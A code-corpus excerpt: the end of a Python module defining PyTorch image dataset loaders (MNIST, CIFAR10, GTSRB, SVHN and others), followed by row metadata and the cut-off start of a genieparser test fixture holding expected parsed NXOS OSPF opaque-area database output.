# get classification labels for each seat from folder name
classif_labels = self._get_classif_label(file.parent)
# open the image specified by the path
# make sure it is a grayscale image
img = np.array(Image.open(file).convert("L"))
# each scene will be an array of images
# append the image to the placeholder
self.images.append([img])
# append label to placeholder
self.labels.append(classif_labels)
def _pre_process_dataset(self):
# get all the subfolders inside the dataset folder
data_folder_variations = self.root_dir.glob("*")
# for each variation
for folder in data_folder_variations:
# for each split
for pre_processed_split in ["pp_train-adults_64", "pp_train-adults-and-seats_64", "pp_test-adults_64", "pp_test-objects_64", "pp_test-seats_64", "pp_test-adults-and-objects_64", "pp_test-adults-and-seats_64", "pp_test-adults-and-seats-and-objects_64"]:
# create the path
path_to_preprocessed_split = folder / pre_processed_split
path_to_vanilla_split = folder / pre_processed_split.split("_")[1]
# if no pre-processing for these settings exists, then create them
if not path_to_preprocessed_split.exists():
print("-" * 37)
print(f"Pre-process and save data for folder: {folder} and split: {pre_processed_split} and downscale size: 64 ...")
self.pre_process_and_save_data(path_to_preprocessed_split, path_to_vanilla_split)
print("Pre-processing and saving finished.")
print("-" * 37)
def pre_process_and_save_data(self, path_to_preprocessed_split, path_to_vanilla_split):
"""
To speed up training, it is beneficial to do the rudementary pre-processing once and save the data.
"""
# create the folders to save the pre-processed data
path_to_preprocessed_split.mkdir()
# get all the files in all the subfolders
files = list(path_to_vanilla_split.glob(f"**/ir.png")) + list(path_to_vanilla_split.glob(f"**/rgb.png"))
# for each image
for curr_file in files:
# open the image specified by the path
img = Image.open(curr_file).convert("L") if "ir" in curr_file.name else Image.open(curr_file).convert("RGB")
# center crop the image using the smaller size (i.e. width or height)
# to define the new size of the image (basically we remove only either the width or height)
img = TF.center_crop(img, np.min(img.size))
# then resize the image to the one we want to use for training
img = TF.resize(img, 64)
# create the folder for the experiment
save_folder = path_to_preprocessed_split / curr_file.parent.stem
save_folder.mkdir(exist_ok=True)
# save the processed image
img.save(save_folder / curr_file.name)
def _get_positive(self, positive_label):
# get all the potential candidates from the real images which have the same label as the synthetic one
masked = [idx for idx, x in enumerate(self.labels) if x==positive_label]
# choose one index randomly from the masked subset
index = np.random.choice(masked)
input_image = self.images[index][0]
input_image = TF.to_tensor(input_image)
return input_image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index][0]
label = self.labels[index]
str_label = self._get_classif_str(label)
# transform it for pytorch (normalized and transposed)
image = TF.to_tensor(image)
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt": self.label_str_to_int[str_label]}
####################################################################################################################################################
class Fashion(TFashionMNIST):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, train=self.is_train, download=False)
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def _get_subset_of_data(self):
self.images = self.data
self.labels = self.targets
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, label in enumerate(self.labels):
# make sure its a string
label = self._get_classif_str(label)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# only take the subset of indices based on how many samples per class to keep
self.data = [x for idx, x in enumerate(self.images) if idx in keep_indices]
self.targets = [x for idx, x in enumerate(self.labels) if idx in keep_indices]
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.targets)-1)
if int(self.targets[index]) == positive_label:
image = self.data[index]
image = Image.fromarray(image.numpy(), mode='L')
image = TF.resize(image, [64, 64])
image = TF.to_tensor(image)
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.data[index]
label = int(self.targets[index])
# doing this so that it is consistent with all other datasets to return a PIL Image
image = Image.fromarray(image.numpy(), mode='L')
# transform it for pytorch (normalized and transposed)
image = TF.resize(image, [64, 64])
image = TF.to_tensor(image)
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class MNIST(TMNIST):
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/MNIST")
# train or test split, digits or letters
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, train=self.is_train, download=False)
# only get a subset of the data
self._get_subset_of_data()
# dict to transform integers to string labels
self.int_to_label_str = {x:str(x) for x in range(10)}
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, label in enumerate(self.targets):
# make sure its a string
label = self._get_classif_str(label)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self.targets[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
current_image = Image.fromarray(self.data[idx].numpy(), mode="L")
# transform it for pytorch (normalized and transposed)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# get label
current_label = self.targets[idx]
# keep it
self.images.append(current_image)
self.labels.append(current_label)
del self.targets
del self.data
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class GTSRB(Dataset):
string_labels_to_integer_dict = dict()
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# train or test
self.is_train = True if which_split.lower() == "train" else False
if which_split.lower() == "train":
self.folder = "train_png"
elif which_split.lower() == "test":
self.folder = "test_png"
elif which_split.lower() == "ood":
self.folder = "ood_png"
else:
raise ValueError
# path to the main folder
self.root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/GTSRB") / self.folder
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.RandomBrightnessContrast(always_apply=False, p=0.4, brightness_limit=(0.0, 0.33), contrast_limit=(0.0, 0.33), brightness_by_max=False),
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
"""
Return the total number of samples in the dataset.
"""
# number of images to use
return len(self.images)
def _get_subset_of_data(self):
self.all_images = list(self.root_dir.glob("*/*.png"))
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, img in enumerate(self.all_images):
# get the label
label = self._get_label_from_path(img)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self.all_images[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
current_image = Image.open(self.all_images[idx]).convert("L")
# transform it for pytorch (normalized and transposed)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# get label
current_label = self._get_label_from_path(self.all_images[idx])
# keep it
self.images.append(current_image)
self.labels.append(current_label)
def _get_label_from_path(self, path):
# get the name from the parent folder
if self.folder == "ood":
if int(path.parent.name) < 10:
return int(path.parent.name)
else:
return int(path.parent.name)-10
else:
return int(path.parent.name)-10
def _get_positive(self, positive_label):
# get all the potential candidates from the real images which have the same label as the synthetic one
masked = [idx for idx, x in enumerate(self.labels) if x==positive_label]
# choose one index randomly from the masked subset
index = np.random.choice(masked)
input_image = self.images[index]
return input_image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = self.labels[index]
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class CIFAR10(TCIFAR10):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/CIFAR10")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, train=self.is_train, download=False)
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.RandomBrightnessContrast(always_apply=False, p=0.4, brightness_limit=(0.0, 0.33), contrast_limit=(0.0, 0.33), brightness_by_max=False),
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, label in enumerate(self.targets):
# make sure its a string
label = self._get_classif_str(label)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self.data[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
current_image = Image.fromarray(self.data[idx]).convert("L")
# transform it for pytorch (normalized and transposed)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# get label
current_label = self.targets[idx]
# keep it
self.images.append(current_image)
self.labels.append(current_label)
del self.targets
del self.data
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class SVHN(TSVHN):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/SVHN")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, split="train" if self.is_train else "test", download=False)
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.RandomBrightnessContrast(always_apply=False, p=0.4, brightness_limit=(0.0, 0.33), contrast_limit=(0.0, 0.33), brightness_by_max=False),
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.targets = self.labels
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, label in enumerate(self.targets):
# make sure its a string
label = self._get_classif_str(label)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self.data[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
current_image = Image.fromarray(np.transpose(self.data[idx], (1, 2, 0))).convert("L")
# transform it for pytorch (normalized and transposed)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# get label
current_label = self.targets[idx]
# keep it
self.images.append(current_image)
self.labels.append(current_label)
del self.targets
del self.data
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class Omniglot(TOmniglot):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/Omniglot")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, background=self.is_train, download=False)
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, (_, character_class) in enumerate(self._flat_character_images):
# increase the counter for this label
counter[character_class] += 1
# if we are above the theshold for this label
if counter[character_class] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self._flat_character_images[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
image_name, character_class = self._flat_character_images[idx]
image_path = os.path.join(self.target_folder, self._characters[character_class], image_name)
current_image = Image.open(image_path, mode='r').convert('L')
# transform it for pytorch (normalized and transposed)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# keep it
self.images.append(current_image)
self.labels.append(character_class)
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class Places365(TPlaces365):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/Places365")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, split="train-standard" if self.is_train else "val", small=True, download=False)
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, (_, target) in enumerate(self.imgs):
# increase the counter for this label
counter[target] += 1
# if we are above the theshold for this label
if counter[target] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx, _ in enumerate(self.imgs[0:10_000])]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
# get the image
file, target = self.imgs[idx]
current_image = self.loader(file)
# transform it for pytorch (normalized and transposed)
current_image = TF.rgb_to_grayscale(current_image, num_output_channels=1)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# keep it
self.images.append(current_image)
self.labels.append(target)
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
class LSUN(TLSUN):
# dict to transform integers to string labels
int_to_label_str = {x:str(x) for x in range(10)}
def __init__(self, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = Path(f"/data/local_data/workingdir_g02/sds/data/LSUN")
# train or test split
self.split = which_split
self.is_train = True if self.split.lower() == "train" else False
# normal or impossible reconstruction loss?
self.make_instance_impossible = make_instance_impossible
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# call the init function of the parent class
super().__init__(root=root_dir, classes="train" if self.is_train else "test")
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
def _get_classif_str(self, label):
return int(label)
def __len__(self):
return len(self.images)
def _get_subset_of_data(self):
self.images = []
self.labels = []
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx in range(self.length):
target = 0
for ind in self.indices:
if idx < ind:
break
target += 1
# increase the counter for this label
counter[target] += 1
# if we are above the theshold for this label
if counter[target] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# testing
else:
keep_indices = [idx for idx in range(10_000)]
# only take the subset of indices based on how many samples per class to keep
for idx in keep_indices:
target = 0
sub = 0
for ind in self.indices:
if idx < ind:
break
target += 1
sub = ind
db = self.dbs[target]
idx = idx - sub
current_image, _ = db[idx]
# transform it for pytorch (normalized and transposed)
current_image = TF.rgb_to_grayscale(current_image, num_output_channels=1)
current_image = TF.resize(current_image, [64, 64])
current_image = TF.to_tensor(current_image)
# keep it
self.images.append(current_image)
self.labels.append(target)
def _get_positive(self, positive_label):
while True:
index = random.randint(0, len(self.labels)-1)
if int(self.labels[index]) == positive_label:
image = self.images[index]
return image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index]
label = int(self.labels[index])
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt":label}
####################################################################################################################################################
def print_dataset_statistics(dataset, which_dataset, which_split):
# if a vehicle dataset
if which_dataset.lower() in ["sviro", "sviro_uncertainty"]:
# get the int label for all labels
labels = np.array([dataset.label_str_to_int["_".join([str(y) for y in x])] for x in dataset.labels])
int_to_label_str = dataset.int_to_label_str
elif hasattr(dataset, "labels"):
labels = np.array(dataset.labels)
int_to_label_str = None
elif hasattr(dataset, "targets"):
labels = np.array(dataset.targets)
int_to_label_str = None
else:
print("No targets or labels attribute.")
return
unique_labels, labels_counts = np.unique(labels, return_counts=True)
if int_to_label_str is None:
int_to_label_str = {x:str(x) for x in unique_labels}
print("=" * 37)
print("Dataset used: \t", dataset)
print("Split: \t\t", which_split)
print("Samples: \t", len(dataset))
print("-" * 37)
# print the label and its number of occurences
for label, count in zip(unique_labels, labels_counts):
print(f"Label {int_to_label_str[label]}: {count}")
print("=" * 37)
####################################################################################################################################################
def create_dataset(which_dataset, which_factor, which_split, make_scene_impossible=False, make_instance_impossible=False, augment=False, batch_size=64, shuffle=True, nbr_of_samples_per_class=-1, print_dataset=True):
# create the dataset
if which_dataset.lower() == "sviro":
dataset = SVIRO(car=which_factor, which_split=which_split, make_instance_impossible=make_instance_impossible, augment=augment)
elif which_dataset.lower() == "sviro_uncertainty":
dataset = SVIROUncertainty(car=which_factor, which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "fashion":
dataset = Fashion(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "mnist":
dataset = MNIST(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "gtsrb":
dataset = GTSRB(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "cifar10":
dataset = CIFAR10(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "svhn":
dataset = SVHN(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "omniglot":
dataset = Omniglot(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "places365":
dataset = Places365(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
elif which_dataset.lower() == "lsun":
dataset = LSUN(which_split=which_split, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
else:
raise ValueError
if len(dataset) == 0:
raise ValueError("The length of the dataset is zero. There is probably a problem with the folder structure for the dataset you want to consider. Have you downloaded the dataset and used the correct folder name and folder tree structure?")
# for reproducibility
# https://pytorch.org/docs/1.9.0/notes/randomness.html?highlight=reproducibility
g = torch.Generator()
g.manual_seed(0)
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2**32
np.random.seed(worker_seed)
random.seed(worker_seed)
# create loader for the defined dataset
train_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=4,
pin_memory=True,
worker_init_fn=seed_worker,
generator=g,
)
if print_dataset:
print_dataset_statistics(dataset, which_dataset, which_split)
return train_loader
####################################################################################################################################################
| 36.703452
| 264
| 0.578367
| 7,881
| 64,855
| 4.559827
| 0.054688
| 0.021789
| 0.03548
| 0.035953
| 0.861921
| 0.8435
| 0.826664
| 0.808604
| 0.800339
| 0.784534
| 0
| 0.01167
| 0.297094
| 64,855
| 1,767
| 265
| 36.703452
| 0.775265
| 0.21949
| 0
| 0.707376
| 0
| 0.003628
| 0.045697
| 0.017005
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08948
| false
| 0
| 0.020556
| 0.018138
| 0.187424
| 0.029021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dc7ce190fcfa4b717cf696ae02ff8d88d5fd1a7
| 51,900
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/ShowIpOspfDatabaseOpaqueAreaDetail/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpOspfDatabaseOpaqueAreaDetail/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpOspfDatabaseOpaqueAreaDetail/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
'vrf':
{'default':
{'address_family':
{'ipv4':
{'instance':
{'1':
{'areas':
{'0.0.0.0':
{'database':
{'lsa_types':
{10:
{'lsa_type': 10,
'lsas':
{'10.1.0.0 192.168.4.1':
{'adv_router': '192.168.4.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.4.1',
'age': 720,
'checksum': '0x8c2b',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.4.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.154.1',
'age': 720,
'checksum': '0x8e27',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.154.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.51.1',
'age': 515,
